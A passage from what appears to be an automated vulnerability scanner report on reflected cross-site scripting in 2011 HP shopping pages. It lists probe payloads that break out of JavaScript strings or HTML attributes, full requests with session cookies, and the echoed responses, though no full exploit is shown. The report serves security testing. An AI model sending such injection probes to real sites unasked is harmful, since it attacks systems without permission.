s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Acompare%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'0'%2526oidt%253D2%2526ot%253DBUTTON%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:30:40 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkiiN%2BV3gt6OintvFTXcgOe0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:30:41 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:30:41 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 225497

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
// Commented out below lines to remove directLink
var omni_landing = 'rts_desktop';
var omni_category = 'rts_desktop';
var omni_catLevel = '3';
var omni_subcat1 = 'rts1272f';d8b7fc6fcc3';

//Script added to introduce New Omniture Variables
if(omni_landing == null || omni_landing == '' || omni_landing == 'null')
omni_landing = '';
if(omni_category == n
...[SNIP]...

1.34. http://www.shopping.hp.com/webapp/shopping/product_detail.do [&subcat1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the &subcat1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d02b"%3ba37f49f5348 was submitted in the &subcat1 parameter. This input was echoed as 9d02b";a37f49f5348 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=storefronts&landing=rts_desktop&category=rts_desktop&&subcat1=rts9d02b"%3ba37f49f5348&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/product_comparison.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_comparison.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkoiNyT2w59Nijvv1PXcQyYmmvi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; hpcompc_usen=cartExists=true; EMID=; s_depth=29; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Acompare; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Acompare%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'0'%2526oidt%253D2%2526ot%253DBUTTON%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:30:38 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkiiN%2BV3gt6OintvFTXcgOe0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:30:39 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:30:39 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 225497

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
adReviewsLink() {
return "javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=rts_desktop&category=rts_desktop&subcat1=rts9d02b";a37f49f5348&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');";
}
//-->
...[SNIP]...

1.35. http://www.shopping.hp.com/webapp/shopping/product_detail.do [&subcat1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the &subcat1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c169"%20a%3db%20e63dfdaca2b was submitted in the &subcat1 parameter. This input was echoed as 6c169" a=b e63dfdaca2b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=storefronts&landing=rts_desktop&category=rts_desktop&&subcat1=rts6c169"%20a%3db%20e63dfdaca2b&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/product_comparison.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_comparison.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkoiNyT2w59Nijvv1PXcQyYmmvi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; hpcompc_usen=cartExists=true; EMID=; s_depth=29; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Acompare; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Acompare%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'0'%2526oidt%253D2%2526ot%253DBUTTON%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:30:35 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkiiN%2BV3gt6OintvFTXcgOe0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:30:36 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:30:36 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 225581

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<input type="hidden" name="subcat1" value="rts6c169" a=b e63dfdaca2b">
...[SNIP]...

1.36. http://www.shopping.hp.com/webapp/shopping/product_detail.do [catLevel parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the catLevel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 189ee"%20a%3db%20a5d9061744c was submitted in the catLevel parameter. This input was echoed as 189ee" a=b a5d9061744c in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3189ee"%20a%3db%20a5d9061744c&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:26 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:26 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:26 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 223830

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3189ee" a=b a5d9061744c&mc=&product_code=BV704AA%23ABA&tab=overview&fromPage=/shopping/product_detail.do">
...[SNIP]...

1.37. http://www.shopping.hp.com/webapp/shopping/product_detail.do [catLevel parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the catLevel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85efd'%3bd47dd6dd9bf was submitted in the catLevel parameter. This input was echoed as 85efd';d47dd6dd9bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=385efd'%3bd47dd6dd9bf&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:30 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 223766

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
category & subcat1 from the request
// Commented out below lines to remove directLink
var omni_landing = 'desktops';
var omni_category = 'p7xt_series';
var omni_catLevel = '385efd';d47dd6dd9bf';
var omni_subcat1 = 'rts';

//Script added to introduce New Omniture Variables
if(omni_landing == null || omni_landing == '' || omni_landing == 'null')
omni_la
...[SNIP]...

1.38. http://www.shopping.hp.com/webapp/shopping/product_detail.do [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d244c"%20a%3db%205931038e062 was submitted in the category parameter. This input was echoed as d244c" a=b 5931038e062 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_seriesd244c"%20a%3db%205931038e062&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
